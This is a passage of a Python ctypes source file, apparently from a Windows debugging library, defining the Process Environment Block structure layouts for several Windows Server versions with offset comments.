# +0x084 HeapDeCommitFreeBlockThreshold : Uint4B
# +0x088 NumberOfHeaps : Uint4B
# +0x08c MaximumNumberOfHeaps : Uint4B
# +0x090 ProcessHeaps : Ptr32 Ptr32 Void
# +0x094 GdiSharedHandleTable : Ptr32 Void
# +0x098 ProcessStarterHelper : Ptr32 Void
# +0x09c GdiDCAttributeList : Uint4B
# +0x0a0 LoaderLock : Ptr32 _RTL_CRITICAL_SECTION
# +0x0a4 OSMajorVersion : Uint4B
# +0x0a8 OSMinorVersion : Uint4B
# +0x0ac OSBuildNumber : Uint2B
# +0x0ae OSCSDVersion : Uint2B
# +0x0b0 OSPlatformId : Uint4B
# +0x0b4 ImageSubsystem : Uint4B
# +0x0b8 ImageSubsystemMajorVersion : Uint4B
# +0x0bc ImageSubsystemMinorVersion : Uint4B
# +0x0c0 ImageProcessAffinityMask : Uint4B
# +0x0c4 GdiHandleBuffer : [34] Uint4B
# +0x14c PostProcessInitRoutine : Ptr32 void
# +0x150 TlsExpansionBitmap : Ptr32 Void
# +0x154 TlsExpansionBitmapBits : [32] Uint4B
# +0x1d4 SessionId : Uint4B
# +0x1d8 AppCompatFlags : _ULARGE_INTEGER
# +0x1e0 AppCompatFlagsUser : _ULARGE_INTEGER
# +0x1e8 pShimData : Ptr32 Void
# +0x1ec AppCompatInfo : Ptr32 Void
# +0x1f0 CSDVersion : _UNICODE_STRING
# +0x1f8 ActivationContextData : Ptr32 _ACTIVATION_CONTEXT_DATA
# +0x1fc ProcessAssemblyStorageMap : Ptr32 _ASSEMBLY_STORAGE_MAP
# +0x200 SystemDefaultActivationContextData : Ptr32 _ACTIVATION_CONTEXT_DATA
# +0x204 SystemAssemblyStorageMap : Ptr32 _ASSEMBLY_STORAGE_MAP
# +0x208 MinimumStackCommit : Uint4B
# +0x20c FlsCallback : Ptr32 Ptr32 Void
# +0x210 FlsListHead : _LIST_ENTRY
# +0x218 FlsBitmap : Ptr32 Void
# +0x21c FlsBitmapBits : [4] Uint4B
# +0x22c FlsHighIndex : Uint4B
class _PEB_2003(Structure):
_pack_ = 8
_fields_ = [
("InheritedAddressSpace", BOOLEAN),
("ReadImageFileExecOptions", UCHAR),
("BeingDebugged", BOOLEAN),
("BitField", UCHAR),
("Mutant", HANDLE),
("ImageBaseAddress", PVOID),
("Ldr", PVOID), # PPEB_LDR_DATA
("ProcessParameters", PVOID), # PRTL_USER_PROCESS_PARAMETERS
("SubSystemData", PVOID),
("ProcessHeap", PVOID),
("FastPebLock", PVOID), # PRTL_CRITICAL_SECTION
("AtlThunkSListPtr", PVOID),
("SparePtr2", PVOID),
("EnvironmentUpdateCount", DWORD),
("KernelCallbackTable", PVOID),
("SystemReserved", DWORD),
("SpareUlong", DWORD),
("FreeList", PVOID), # PPEB_FREE_BLOCK
("TlsExpansionCounter", DWORD),
("TlsBitmap", PVOID),
("TlsBitmapBits", DWORD * 2),
("ReadOnlySharedMemoryBase", PVOID),
("ReadOnlySharedMemoryHeap", PVOID),
("ReadOnlyStaticServerData", PVOID), # Ptr32 Ptr32 Void
("AnsiCodePageData", PVOID),
("OemCodePageData", PVOID),
("UnicodeCaseTableData", PVOID),
("NumberOfProcessors", DWORD),
("NtGlobalFlag", DWORD),
("CriticalSectionTimeout", LONGLONG), # LARGE_INTEGER
("HeapSegmentReserve", DWORD),
("HeapSegmentCommit", DWORD),
("HeapDeCommitTotalFreeThreshold", DWORD),
("HeapDeCommitFreeBlockThreshold", DWORD),
("NumberOfHeaps", DWORD),
("MaximumNumberOfHeaps", DWORD),
("ProcessHeaps", PVOID), # Ptr32 Ptr32 Void
("GdiSharedHandleTable", PVOID),
("ProcessStarterHelper", PVOID),
("GdiDCAttributeList", DWORD),
("LoaderLock", PVOID), # PRTL_CRITICAL_SECTION
("OSMajorVersion", DWORD),
("OSMinorVersion", DWORD),
("OSBuildNumber", WORD),
("OSCSDVersion", WORD),
("OSPlatformId", DWORD),
("ImageSubsystem", DWORD),
("ImageSubsystemMajorVersion", DWORD),
("ImageSubsystemMinorVersion", DWORD),
("ImageProcessAffinityMask", DWORD),
("GdiHandleBuffer", DWORD * 34),
("PostProcessInitRoutine", PPS_POST_PROCESS_INIT_ROUTINE),
("TlsExpansionBitmap", PVOID),
("TlsExpansionBitmapBits", DWORD * 32),
("SessionId", DWORD),
("AppCompatFlags", ULONGLONG), # ULARGE_INTEGER
("AppCompatFlagsUser", ULONGLONG), # ULARGE_INTEGER
("pShimData", PVOID),
("AppCompatInfo", PVOID),
("CSDVersion", UNICODE_STRING),
("ActivationContextData", PVOID), # ACTIVATION_CONTEXT_DATA
("ProcessAssemblyStorageMap", PVOID), # ASSEMBLY_STORAGE_MAP
("SystemDefaultActivationContextData", PVOID), # ACTIVATION_CONTEXT_DATA
("SystemAssemblyStorageMap", PVOID), # ASSEMBLY_STORAGE_MAP
("MinimumStackCommit", QWORD),
("FlsCallback", PVOID), # Ptr32 Ptr32 Void
("FlsListHead", LIST_ENTRY),
("FlsBitmap", PVOID),
("FlsBitmapBits", DWORD * 4),
("FlsHighIndex", DWORD),
]
_PEB_2003_64 = _PEB_XP_64
_PEB_2003_R2 = _PEB_2003
_PEB_2003_R2_64 = _PEB_2003_64
# +0x000 InheritedAddressSpace : UChar
# +0x001 ReadImageFileExecOptions : UChar
# +0x002 BeingDebugged : UChar
# +0x003 BitField : UChar
# +0x003 ImageUsesLargePages : Pos 0, 1 Bit
# +0x003 IsProtectedProcess : Pos 1, 1 Bit
# +0x003 IsLegacyProcess : Pos 2, 1 Bit
# +0x003 IsImageDynamicallyRelocated : Pos 3, 1 Bit
# +0x003 SkipPatchingUser32Forwarders : Pos 4, 1 Bit
# +0x003 SpareBits : Pos 5, 3 Bits
# +0x004 Mutant : Ptr32 Void
# +0x008 ImageBaseAddress : Ptr32 Void
# +0x00c Ldr : Ptr32 _PEB_LDR_DATA
# +0x010 ProcessParameters : Ptr32 _RTL_USER_PROCESS_PARAMETERS
# +0x014 SubSystemData : Ptr32 Void
# +0x018 ProcessHeap : Ptr32 Void
# +0x01c FastPebLock : Ptr32 _RTL_CRITICAL_SECTION
# +0x020 AtlThunkSListPtr : Ptr32 Void
# +0x024 IFEOKey : Ptr32 Void
# +0x028 CrossProcessFlags : Uint4B
# +0x028 ProcessInJob : Pos 0, 1 Bit
# +0x028 ProcessInitializing : Pos 1, 1 Bit
# +0x028 ProcessUsingVEH : Pos 2, 1 Bit
# +0x028 ProcessUsingVCH : Pos 3, 1 Bit
# +0x028 ReservedBits0 : Pos 4, 28 Bits
# +0x02c KernelCallbackTable : Ptr32 Void
# +0x02c UserSharedInfoPtr : Ptr32 Void
# +0x030 SystemReserved : [1] Uint4B
# +0x034 SpareUlong : Uint4B
# +0x038 SparePebPtr0 : Uint4B
# +0x03c TlsExpansionCounter : Uint4B
# +0x040 TlsBitmap : Ptr32 Void
# +0x044 TlsBitmapBits : [2] Uint4B
# +0x04c ReadOnlySharedMemoryBase : Ptr32 Void
# +0x050 HotpatchInformation : Ptr32 Void
# +0x054 ReadOnlyStaticServerData : Ptr32 Ptr32 Void
# +0x058 AnsiCodePageData : Ptr32 Void
# +0x05c OemCodePageData : Ptr32 Void
# +0x060 UnicodeCaseTableData : Ptr32 Void
# +0x064 NumberOfProcessors : Uint4B
# +0x068 NtGlobalFlag : Uint4B
# +0x070 CriticalSectionTimeout : _LARGE_INTEGER
# +0x078 HeapSegmentReserve : Uint4B
# +0x07c HeapSegmentCommit : Uint4B
# +0x080 HeapDeCommitTotalFreeThreshold : Uint4B
# +0x084 HeapDeCommitFreeBlockThreshold : Uint4B
# +0x088 NumberOfHeaps : Uint4B
# +0x08c MaximumNumberOfHeaps : Uint4B
# +0x090 ProcessHeaps : Ptr32 Ptr32 Void
# +0x094 GdiSharedHandleTable : Ptr32 Void
# +0x098 ProcessStarterHelper : Ptr32 Void
# +0x09c GdiDCAttributeList : Uint4B
# +0x0a0 LoaderLock : Ptr32 _RTL_CRITICAL_SECTION
# +0x0a4 OSMajorVersion : Uint4B
# +0x0a8 OSMinorVersion : Uint4B
# +0x0ac OSBuildNumber : Uint2B
# +0x0ae OSCSDVersion : Uint2B
# +0x0b0 OSPlatformId : Uint4B
# +0x0b4 ImageSubsystem : Uint4B
# +0x0b8 ImageSubsystemMajorVersion : Uint4B
# +0x0bc ImageSubsystemMinorVersion : Uint4B
# +0x0c0 ActiveProcessAffinityMask : Uint4B
# +0x0c4 GdiHandleBuffer : [34] Uint4B
# +0x14c PostProcessInitRoutine : Ptr32 void
# +0x150 TlsExpansionBitmap : Ptr32 Void
# +0x154 TlsExpansionBitmapBits : [32] Uint4B
# +0x1d4 SessionId : Uint4B
# +0x1d8 AppCompatFlags : _ULARGE_INTEGER
# +0x1e0 AppCompatFlagsUser : _ULARGE_INTEGER
# +0x1e8 pShimData : Ptr32 Void
# +0x1ec AppCompatInfo : Ptr32 Void
# +0x1f0 CSDVersion : _UNICODE_STRING
# +0x1f8 ActivationContextData : Ptr32 _ACTIVATION_CONTEXT_DATA
# +0x1fc ProcessAssemblyStorageMap : Ptr32 _ASSEMBLY_STORAGE_MAP
# +0x200 SystemDefaultActivationContextData : Ptr32 _ACTIVATION_CONTEXT_DATA
# +0x204 SystemAssemblyStorageMap : Ptr32 _ASSEMBLY_STORAGE_MAP
# +0x208 MinimumStackCommit : Uint4B
# +0x20c FlsCallback : Ptr32 _FLS_CALLBACK_INFO
# +0x210 FlsListHead : _LIST_ENTRY
# +0x218 FlsBitmap : Ptr32 Void
# +0x21c FlsBitmapBits : [4] Uint4B
# +0x22c FlsHighIndex : Uint4B
# +0x230 WerRegistrationData : Ptr32 Void
# +0x234 WerShipAssertPtr : Ptr32 Void
class _PEB_2008(Structure):
_pack_ = 8
_fields_ = [
("InheritedAddressSpace", BOOLEAN),
("ReadImageFileExecOptions", UCHAR),
("BeingDebugged", BOOLEAN),
("BitField", UCHAR),
("Mutant", HANDLE),
("ImageBaseAddress", PVOID),
("Ldr", PVOID), # PPEB_LDR_DATA
("ProcessParameters", PVOID), # PRTL_USER_PROCESS_PARAMETERS
("SubSystemData", PVOID),
("ProcessHeap", PVOID),
("FastPebLock", PVOID), # PRTL_CRITICAL_SECTION
("AtlThunkSListPtr", PVOID),
("IFEOKey", PVOID),
("CrossProcessFlags", DWORD),
("KernelCallbackTable", PVOID),
("SystemReserved", DWORD),
("SpareUlong", DWORD),
("SparePebPtr0", PVOID),
("TlsExpansionCounter", DWORD),
("TlsBitmap", PVOID),
("TlsBitmapBits", DWORD * 2),
("ReadOnlySharedMemoryBase", PVOID),
("HotpatchInformation", PVOID),
("ReadOnlyStaticServerData", PVOID), # Ptr32 Ptr32 Void
("AnsiCodePageData", PVOID),
("OemCodePageData", PVOID),
("UnicodeCaseTableData", PVOID),
("NumberOfProcessors", DWORD),
("NtGlobalFlag", DWORD),
("CriticalSectionTimeout", LONGLONG), # LARGE_INTEGER
("HeapSegmentReserve", DWORD),
("HeapSegmentCommit", DWORD),
("HeapDeCommitTotalFreeThreshold", DWORD),
("HeapDeCommitFreeBlockThreshold", DWORD),
("NumberOfHeaps", DWORD),
("MaximumNumberOfHeaps", DWORD),
("ProcessHeaps", PVOID), # Ptr32 Ptr32 Void
("GdiSharedHandleTable", PVOID),
("ProcessStarterHelper", PVOID),
("GdiDCAttributeList", DWORD),
("LoaderLock", PVOID), # PRTL_CRITICAL_SECTION
("OSMajorVersion", DWORD),
("OSMinorVersion", DWORD),
("OSBuildNumber", WORD),
("OSCSDVersion", WORD),
("OSPlatformId", DWORD),
("ImageSubsystem", DWORD),
("ImageSubsystemMajorVersion", DWORD),
("ImageSubsystemMinorVersion", DWORD),
("ActiveProcessAffinityMask", DWORD),
("GdiHandleBuffer", DWORD * 34),
("PostProcessInitRoutine", PPS_POST_PROCESS_INIT_ROUTINE),
("TlsExpansionBitmap", PVOID),
("TlsExpansionBitmapBits", DWORD * 32),
("SessionId", DWORD),
("AppCompatFlags", ULONGLONG), # ULARGE_INTEGER
("AppCompatFlagsUser", ULONGLONG), # ULARGE_INTEGER
("pShimData", PVOID),
("AppCompatInfo", PVOID),
("CSDVersion", UNICODE_STRING),
("ActivationContextData", PVOID), # ACTIVATION_CONTEXT_DATA
("ProcessAssemblyStorageMap", PVOID), # ASSEMBLY_STORAGE_MAP
("SystemDefaultActivationContextData", PVOID), # ACTIVATION_CONTEXT_DATA
("SystemAssemblyStorageMap", PVOID), # ASSEMBLY_STORAGE_MAP
("MinimumStackCommit", DWORD),
("FlsCallback", PVOID), # PFLS_CALLBACK_INFO
("FlsListHead", LIST_ENTRY),
("FlsBitmap", PVOID),
("FlsBitmapBits", DWORD * 4),
("FlsHighIndex", DWORD),
("WerRegistrationData", PVOID),
("WerShipAssertPtr", PVOID),
]
def __get_UserSharedInfoPtr(self):
return self.KernelCallbackTable
def __set_UserSharedInfoPtr(self, value):
self.KernelCallbackTable = value
UserSharedInfoPtr = property(__get_UserSharedInfoPtr, __set_UserSharedInfoPtr)
# +0x000 InheritedAddressSpace : UChar
# +0x001 ReadImageFileExecOptions : UChar
# +0x002 BeingDebugged : UChar
# +0x003 BitField : UChar
# +0x003 ImageUsesLargePages : Pos 0, 1 Bit
# +0x003 IsProtectedProcess : Pos 1, 1 Bit
# +0x003 IsLegacyProcess : Pos 2, 1 Bit
# +0x003 IsImageDynamicallyRelocated : Pos 3, 1 Bit
# +0x003 SkipPatchingUser32Forwarders : Pos 4, 1 Bit
# +0x003 SpareBits : Pos 5, 3 Bits
# +0x008 Mutant : Ptr64 Void
# +0x010 ImageBaseAddress : Ptr64 Void
# +0x018 Ldr : Ptr64 _PEB_LDR_DATA
# +0x020 ProcessParameters : Ptr64 _RTL_USER_PROCESS_PARAMETERS
# +0x028 SubSystemData : Ptr64 Void
# +0x030 ProcessHeap : Ptr64 Void
# +0x038 FastPebLock : Ptr64 _RTL_CRITICAL_SECTION
# +0x040 AtlThunkSListPtr : Ptr64 Void
# +0x048 IFEOKey : Ptr64 Void
# +0x050 CrossProcessFlags : Uint4B
# +0x050 ProcessInJob : Pos 0, 1 Bit
# +0x050 ProcessInitializing : Pos 1, 1 Bit
# +0x050 ProcessUsingVEH : Pos 2, 1 Bit
# +0x050 ProcessUsingVCH : Pos 3, 1 Bit
# +0x050 ReservedBits0 : Pos 4, 28 Bits
# +0x058 KernelCallbackTable : Ptr64 Void
# +0x058 UserSharedInfoPtr : Ptr64 Void
# +0x060 SystemReserved : [1] Uint4B
# +0x064 SpareUlong : Uint4B
# +0x068 SparePebPtr0 : Uint8B
# +0x070 TlsExpansionCounter : Uint4B
# +0x078 TlsBitmap : Ptr64 Void
# +0x080 TlsBitmapBits : [2] Uint4B
# +0x088 ReadOnlySharedMemoryBase : Ptr64 Void
# +0x090 HotpatchInformation : Ptr64 Void
# +0x098 ReadOnlyStaticServerData : Ptr64 Ptr64 Void
# +0x0a0 AnsiCodePageData : Ptr64 Void
# +0x0a8 OemCodePageData : Ptr64 Void
# +0x0b0 UnicodeCaseTableData : Ptr64 Void
# +0x0b8 NumberOfProcessors : Uint4B
# +0x0bc NtGlobalFlag : Uint4B
# +0x0c0 CriticalSectionTimeout : _LARGE_INTEGER
# +0x0c8 HeapSegmentReserve : Uint8B
# +0x0d0 HeapSegmentCommit : Uint8B
# +0x0d8 HeapDeCommitTotalFreeThreshold : Uint8B
# +0x0e0 HeapDeCommitFreeBlockThreshold : Uint8B
# +0x0e8 NumberOfHeaps : Uint4B
# +0x0ec MaximumNumberOfHeaps : Uint4B
# +0x0f0 ProcessHeaps : Ptr64 Ptr64 Void
# +0x0f8 GdiSharedHandleTable : Ptr64 Void
# +0x100 ProcessStarterHelper : Ptr64 Void
# +0x108 GdiDCAttributeList : Uint4B
# +0x110 LoaderLock : Ptr64 _RTL_CRITICAL_SECTION
# +0x118 OSMajorVersion : Uint4B
# +0x11c OSMinorVersion : Uint4B
# +0x120 OSBuildNumber : Uint2B
# +0x122 OSCSDVersion : Uint2B
# +0x124 OSPlatformId : Uint4B
# +0x128 ImageSubsystem : Uint4B
# +0x12c ImageSubsystemMajorVersion : Uint4B
# +0x130 ImageSubsystemMinorVersion : Uint4B
# +0x138 ActiveProcessAffinityMask : Uint8B
# +0x140 GdiHandleBuffer : [60] Uint4B
# +0x230 PostProcessInitRoutine : Ptr64 void
# +0x238 TlsExpansionBitmap : Ptr64 Void
# +0x240 TlsExpansionBitmapBits : [32] Uint4B
# +0x2c0 SessionId : Uint4B
# +0x2c8 AppCompatFlags : _ULARGE_INTEGER
# +0x2d0 AppCompatFlagsUser : _ULARGE_INTEGER
# +0x2d8 pShimData : Ptr64 Void
# +0x2e0 AppCompatInfo : Ptr64 Void
# +0x2e8 CSDVersion : _UNICODE_STRING
# +0x2f8 ActivationContextData : Ptr64 _ACTIVATION_CONTEXT_DATA
# +0x300 ProcessAssemblyStorageMap : Ptr64 _ASSEMBLY_STORAGE_MAP
# +0x308 SystemDefaultActivationContextData : Ptr64 _ACTIVATION_CONTEXT_DATA
# +0x310 SystemAssemblyStorageMap : Ptr64 _ASSEMBLY_STORAGE_MAP
# +0x318 MinimumStackCommit : Uint8B
# +0x320 FlsCallback : Ptr64 _FLS_CALLBACK_INFO
# +0x328 FlsListHead : _LIST_ENTRY
# +0x338 FlsBitmap : Ptr64 Void
# +0x340 FlsBitmapBits : [4] Uint4B
# +0x350 FlsHighIndex : Uint4B
# +0x358 WerRegistrationData : Ptr64 Void
# +0x360 WerShipAssertPtr : Ptr64 Void
class _PEB_2008_64(Structure):
_pack_ = 8
_fields_ = [
("InheritedAddressSpace", BOOLEAN),
("ReadImageFileExecOptions", UCHAR),
("BeingDebugged", BOOLEAN),
("BitField", UCHAR),
("Mutant", HANDLE),
("ImageBaseAddress", PVOID),
("Ldr", PVOID), # PPEB_LDR_DATA
("ProcessParameters", PVOID), # PRTL_USER_PROCESS_PARAMETERS
("SubSystemData", PVOID),
("ProcessHeap", PVOID),
("FastPebLock", PVOID), # PRTL_CRITICAL_SECTION
("AtlThunkSListPtr", PVOID),
("IFEOKey", PVOID),
("CrossProcessFlags", DWORD),
("KernelCallbackTable", PVOID),
("SystemReserved", DWORD),
("SpareUlong", DWORD),
("SparePebPtr0", PVOID),
("TlsExpansionCounter", DWORD),
("TlsBitmap", PVOID),
("TlsBitmapBits", DWORD * 2),
("ReadOnlySharedMemoryBase", PVOID),
("HotpatchInformation", PVOID),
("ReadOnlyStaticServerData", PVOID), # Ptr64 Ptr64 Void
("AnsiCodePageData", PVOID),
("OemCodePageData", PVOID),
("UnicodeCaseTableData", PVOID),
("NumberOfProcessors", DWORD),
("NtGlobalFlag", DWORD),
("CriticalSectionTimeout", LONGLONG), # LARGE_INTEGER
("HeapSegmentReserve", QWORD),
("HeapSegmentCommit", QWORD),
("HeapDeCommitTotalFreeThreshold", QWORD),
("HeapDeCommitFreeBlockThreshold", QWORD),
("NumberOfHeaps", DWORD),
("MaximumNumberOfHeaps", DWORD),
("ProcessHeaps", PVOID), # Ptr64 Ptr64 Void
("GdiSharedHandleTable", PVOID),
("ProcessStarterHelper", PVOID),
("GdiDCAttributeList", DWORD),
("LoaderLock", PVOID), # PRTL_CRITICAL_SECTION
("OSMajorVersion", DWORD),
("OSMinorVersion", DWORD),
("OSBuildNumber", WORD),
("OSCSDVersion", WORD),
("OSPlatformId", DWORD),
("ImageSubsystem", DWORD),
("ImageSubsystemMajorVersion", DWORD),
("ImageSubsystemMinorVersion", DWORD),
("ActiveProcessAffinityMask", QWORD),
("GdiHandleBuffer", DWORD * 60),
("PostProcessInitRoutine", PPS_POST_PROCESS_INIT_ROUTINE),
("TlsExpansionBitmap", PVOID),
("TlsExpansionBitmapBits", DWORD * 32),
("SessionId", DWORD),
("AppCompatFlags", ULONGLONG), # ULARGE_INTEGER
("AppCompatFlagsUser", ULONGLONG), # ULARGE_INTEGER
("pShimData", PVOID),
("AppCompatInfo", PVOID),
("CSDVersion", UNICODE_STRING),
("ActivationContextData", PVOID), # ACTIVATION_CONTEXT_DATA
("ProcessAssemblyStorageMap", PVOID), # ASSEMBLY_STORAGE_MAP
("SystemDefaultActivationContextData", PVOID), # ACTIVATION_CONTEXT_DATA
("SystemAssemblyStorageMap", PVOID), # ASSEMBLY_STORAGE_MAP
("MinimumStackCommit", QWORD),
("FlsCallback", PVOID), # PFLS_CALLBACK_INFO
("FlsListHead", LIST_ENTRY),
("FlsBitmap", PVOID),
("FlsBitmapBits", DWORD * 4),
("FlsHighIndex", DWORD),
("WerRegistrationData", PVOID),
("WerShipAssertPtr", PVOID),
]
def __get_UserSharedInfoPtr(self):
return self.KernelCallbackTable
def __set_UserSharedInfoPtr(self, value):
self.KernelCallbackTable = value
UserSharedInfoPtr = property(__get_UserSharedInfoPtr, __set_UserSharedInfoPtr)
# +0x000 InheritedAddressSpace : UChar
# +0x001 ReadImageFileExecOptions : UChar
# +0x002 BeingDebugged : UChar
# +0x003 BitField : UChar
# +0x003 ImageUsesLargePages : Pos 0, 1 Bit
# +0x003 IsProtectedProcess : Pos 1, 1 Bit
# +0x003 IsLegacyProcess : Pos 2, 1 Bit
# +0x003 IsImageDynamicallyRelocated : Pos 3, 1 Bit
# +0x003 SkipPatchingUser32Forwarders : Pos 4, 1 Bit
# +0x003 SpareBits : Pos 5, 3 Bits
# +0x004 Mutant : Ptr32 Void
# +0x008 ImageBaseAddress : Ptr32 Void
# +0x00c Ldr : Ptr32 _PEB_LDR_DATA
# +0x010 ProcessParameters : Ptr32 _RTL_USER_PROCESS_PARAMETERS
# +0x014 SubSystemData : Ptr32 Void
# +0x018 ProcessHeap : Ptr32 Void
# +0x01c FastPebLock : Ptr32 _RTL_CRITICAL_SECTION
# +0x020 AtlThunkSListPtr : Ptr32 Void
# +0x024 IFEOKey : Ptr32 Void
# +0x028 CrossProcessFlags : Uint4B
# +0x028 ProcessInJob : Pos 0, 1 Bit
# +0x028 ProcessInitializing : Pos 1, 1 Bit
# +0x028 ProcessUsingVEH : Pos 2, 1 Bit
# +0x028 ProcessUsingVCH : Pos 3, 1 Bit
# +0x028 ProcessUsingFTH : Pos 4, 1 Bit
# +0x028 ReservedBits0 : Pos 5, 27 Bits
# +0x02c KernelCallbackTable : Ptr32 Void
# +0x02c UserSharedInfoPtr : Ptr32 Void
# +0x030 SystemReserved : [1] Uint4B
# +0x034 AtlThunkSListPtr32 : Uint4B
# +0x038 ApiSetMap : Ptr32 Void
# +0x03c TlsExpansionCounter : Uint4B
# +0x040 TlsBitmap : Ptr32 Void
# +0x044 TlsBitmapBits : [2] Uint4B
# +0x04c ReadOnlySharedMemoryBase : Ptr32 Void
# +0x050 HotpatchInformation : Ptr32 Void
# +0x054 ReadOnlyStaticServerData : Ptr32 Ptr32 Void
# +0x058 AnsiCodePageData : Ptr32 Void
# +0x05c OemCodePageData : Ptr32 Void
# +0x060 UnicodeCaseTableData : Ptr32 Void
# +0x064 NumberOfProcessors : Uint4B
# +0x068 NtGlobalFlag : Uint4B
# +0x070 CriticalSectionTimeout : _LARGE_INTEGER
# +0x078 HeapSegmentReserve : Uint4B
# +0x07c HeapSegmentCommit : Uint4B
# +0x080 HeapDeCommitTotalFreeThreshold : Uint4B
# +0x084 HeapDeCommitFreeBlockThreshold : Uint4B
# +0x088 NumberOfHeaps : Uint4B
# +0x08c MaximumNumberOfHeaps : Uint4B
# +0x090 ProcessHeaps : Ptr32 Ptr32 Void
# +0x094 GdiSharedHandleTable : Ptr32 Void
# +0x098 ProcessStarterHelper : Ptr32 Void
# +0x09c GdiDCAttributeList : Uint4B
# +0x0a0 LoaderLock : Ptr32 _RTL_CRITICAL_SECTION
# +0x0a4 OSMajorVersion : Uint4B
# +0x0a8 OSMinorVersion : Uint4B
# +0x0ac OSBuildNumber : Uint2B
# +0x0ae OSCSDVersion : Uint2B
# +0x0b0 OSPlatformId : Uint4B
# +0x0b4 ImageSubsystem : Uint4B
# +0x0b8 ImageSubsystemMajorVersion : Uint4B
# +0x0bc ImageSubsystemMinorVersion : Uint4B
# +0x0c0 ActiveProcessAffinityMask : Uint4B
# +0x0c4 GdiHandleBuffer : [34] Uint4B
# +0x14c PostProcessInitRoutine : Ptr32 void
# +0x150 TlsExpansionBitmap : Ptr32 Void
# +0x154 TlsExpansionBitmapBits : [32] Uint4B
# +0x1d4 SessionId : Uint4B
# +0x1d8 AppCompatFlags : _ULARGE_INTEGER
# +0x1e0 AppCompatFlagsUser : _ULARGE_INTEGER
# +0x1e8 pShimData : Ptr32 Void
# +0x1ec AppCompatInfo : Ptr32 Void
# +0x1f0 CSDVersion : _UNICODE_STRING
# +0x1f8 ActivationContextData : Ptr32 _ACTIVATION_CONTEXT_DATA
# +0x1fc ProcessAssemblyStorageMap : Ptr32 _ASSEMBLY_STORAGE_MAP
# +0x200 SystemDefaultActivationContextData : Ptr32 _ACTIVATION_CONTEXT_DATA
# +0x204 SystemAssemblyStorageMap : Ptr32 _ASSEMBLY_STORAGE_MAP
# +0x208 MinimumStackCommit : Uint4B
# +0x20c FlsCallback : Ptr32 _FLS_CALLBACK_INFO
# +0x210 FlsListHead : _LIST_ENTRY
# +0x218 FlsBitmap : Ptr32 Void
# +0x21c FlsBitmapBits : [4] Uint4B
# +0x22c FlsHighIndex : Uint4B
# +0x230 WerRegistrationData : Ptr32 Void
# +0x234 WerShipAssertPtr : Ptr32 Void
# +0x238 pContextData : Ptr32 Void
# +0x23c pImageHeaderHash : Ptr32 Void
# +0x240 TracingFlags : Uint4B
# +0x240 HeapTracingEnabled : Pos 0, 1 Bit
# +0x240 CritSecTracingEnabled : Pos 1, 1 Bit
# +0x240 SpareTracingBits : Pos 2, 30 Bits
class _PEB_2008_R2(Structure):
_pack_ = 8
_fields_ = [
("InheritedAddressSpace", BOOLEAN),
("ReadImageFileExecOptions", UCHAR),
("BeingDebugged", BOOLEAN),
("BitField", UCHAR),
("Mutant", HANDLE),
("ImageBaseAddress", PVOID),
("Ldr", PVOID), # PPEB_LDR_DATA
("ProcessParameters", PVOID), # PRTL_USER_PROCESS_PARAMETERS
("SubSystemData", PVOID),
("ProcessHeap", PVOID),
("FastPebLock", PVOID), # PRTL_CRITICAL_SECTION
("AtlThunkSListPtr", PVOID),
("IFEOKey", PVOID),
("CrossProcessFlags", DWORD),
("KernelCallbackTable", PVOID),
("SystemReserved", DWORD),
("AtlThunkSListPtr32", PVOID),
("ApiSetMap", PVOID),
("TlsExpansionCounter", DWORD),
("TlsBitmap", PVOID),
("TlsBitmapBits", DWORD * 2),
("ReadOnlySharedMemoryBase", PVOID),
("HotpatchInformation", PVOID),
("ReadOnlyStaticServerData", PVOID), # Ptr32 Ptr32 Void
("AnsiCodePageData", PVOID),
("OemCodePageData", PVOID),
("UnicodeCaseTableData", PVOID),
("NumberOfProcessors", DWORD),
("NtGlobalFlag", DWORD),
("CriticalSectionTimeout", LONGLONG), # LARGE_INTEGER
("HeapSegmentReserve", DWORD),
("HeapSegmentCommit", DWORD),
("HeapDeCommitTotalFreeThreshold", DWORD),
("HeapDeCommitFreeBlockThreshold", DWORD),
("NumberOfHeaps", DWORD),
("MaximumNumberOfHeaps", DWORD),
("ProcessHeaps", PVOID), # Ptr32 Ptr32 Void
("GdiSharedHandleTable", PVOID),
("ProcessStarterHelper", PVOID),
("GdiDCAttributeList", DWORD),
("LoaderLock", PVOID), # PRTL_CRITICAL_SECTION
("OSMajorVersion", DWORD),
("OSMinorVersion", DWORD),
("OSBuildNumber", WORD),
("OSCSDVersion", WORD),
("OSPlatformId", DWORD),
("ImageSubsystem", DWORD),
("ImageSubsystemMajorVersion", DWORD),
("ImageSubsystemMinorVersion", DWORD),
("ActiveProcessAffinityMask", DWORD),
("GdiHandleBuffer", DWORD * 34),
("PostProcessInitRoutine", PPS_POST_PROCESS_INIT_ROUTINE),
("TlsExpansionBitmap", PVOID),
("TlsExpansionBitmapBits", DWORD * 32),
("SessionId", DWORD),
("AppCompatFlags", ULONGLONG), # ULARGE_INTEGER
("AppCompatFlagsUser", ULONGLONG), # ULARGE_INTEGER
("pShimData", PVOID),
("AppCompatInfo", PVOID),
("CSDVersion", UNICODE_STRING),
("ActivationContextData", PVOID), # ACTIVATION_CONTEXT_DATA
("ProcessAssemblyStorageMap", PVOID), # ASSEMBLY_STORAGE_MAP
("SystemDefaultActivationContextData", PVOID), # ACTIVATION_CONTEXT_DATA
("SystemAssemblyStorageMap", PVOID), # ASSEMBLY_STORAGE_MAP
("MinimumStackCommit", DWORD),
("FlsCallback", PVOID), # PFLS_CALLBACK_INFO
("FlsListHead", LIST_ENTRY),
("FlsBitmap", PVOID),
("FlsBitmapBits", DWORD * 4),
("FlsHighIndex", DWORD),
("WerRegistrationData", PVOID),
("WerShipAssertPtr", PVOID),
("pContextData", PVOID),
("pImageHeaderHash", PVOID),
("TracingFlags", DWORD),
]
def __get_UserSharedInfoPtr(self):
return self.KernelCallbackTable
def __set_UserSharedInfoPtr(self, value):
self.KernelCallbackTable = value
UserSharedInfoPtr = property(__get_UserSharedInfoPtr, __set_UserSharedInfoPtr)
# +0x000 InheritedAddressSpace : UChar
# +0x001 ReadImageFileExecOptions : UChar
# +0x002 BeingDebugged : UChar
# +0x003 BitField : UChar
# +0x003 ImageUsesLargePages : Pos 0, 1 Bit
# +0x003 IsProtectedProcess : Pos 1, 1 Bit
# +0x003 IsLegacyProcess : Pos 2, 1 Bit
# +0x003 IsImageDynamicallyRelocated : Pos 3, 1 Bit
# +0x003 SkipPatchingUser32Forwarders : Pos 4, 1 Bit
# +0x003 SpareBits : Pos 5, 3 Bits
# +0x008 Mutant : Ptr64 Void
# +0x010 ImageBaseAddress : Ptr64 Void
# +0x018 Ldr : Ptr64 _PEB_LDR_DATA
